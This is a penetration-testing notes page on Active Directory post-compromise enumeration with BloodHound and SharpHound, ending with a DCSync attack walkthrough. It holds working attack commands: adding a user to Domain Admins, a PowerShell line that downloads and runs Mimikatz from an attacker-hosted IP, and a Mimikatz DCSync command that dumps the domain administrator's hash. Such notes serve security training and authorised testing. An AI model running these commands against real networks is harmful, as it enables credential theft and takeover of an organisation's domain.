Post Compromise Enumeration Bloodhound
Bloodhound works the same way that [ldapdomaindump ](/active-directory/post-compromise-enumeration/ldapdomaindump.md)but it also collects data using Kerberos tickets and SMB sessi…
Bloodhound
Overview
Bloodhound works the same way that ldapdomaindump but it also collects data using Kerberos tickets and SMB sessions.
Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths.
<figure><img src="/files/Ev6bEn7FAHrsg8ma9jNQ" alt=""><figcaption></figcaption></figure>Domain Enumeration
$sudo neo4j console$sudo bloodhound$sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c allUpload the dumped files into the Bloodhound GUI
Custom user to machine session query
01MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN pSharphound
If you don't have valid AD credentials and only an open shell you can run sharphound.exe to collect the data
{% hint style="danger" %} This is very noisy so it should only be ran if you don't mind the noise {% endhint %}
01SharpHound.exe -c AllMethodology
- Mark all pwned machines
- Check Reachable High Value Targets
- Essentially checks if that one machine could compromise the entire domain
- Check Inbound Control Rights
- What can account/gorups can control this object
- Check Outbound Control Rights (First Degree Object Control)
- What objects can our compromised machine control
DCSync/GetChangesAll
<figure><img src="/files/5RX9b59KdlDDkUNWRhdg" alt=""><figcaption></figcaption></figure>If you have GetChanges and GetChangesAll privileges you can perform a dcsync attack. This attack abuses dcsync and the way it works with syncing domain controllers together to make sure that they both have the most up to date data. This means that we can extract all of the NTLM hashes by requesting a dcsync with the domain controller.
Add yourself to the Domain service accounts
01 net group "Domain Admins" itmanager /add /domainAmsi bypass then use mimikatz
01IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')Grab domain admin hash
01Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'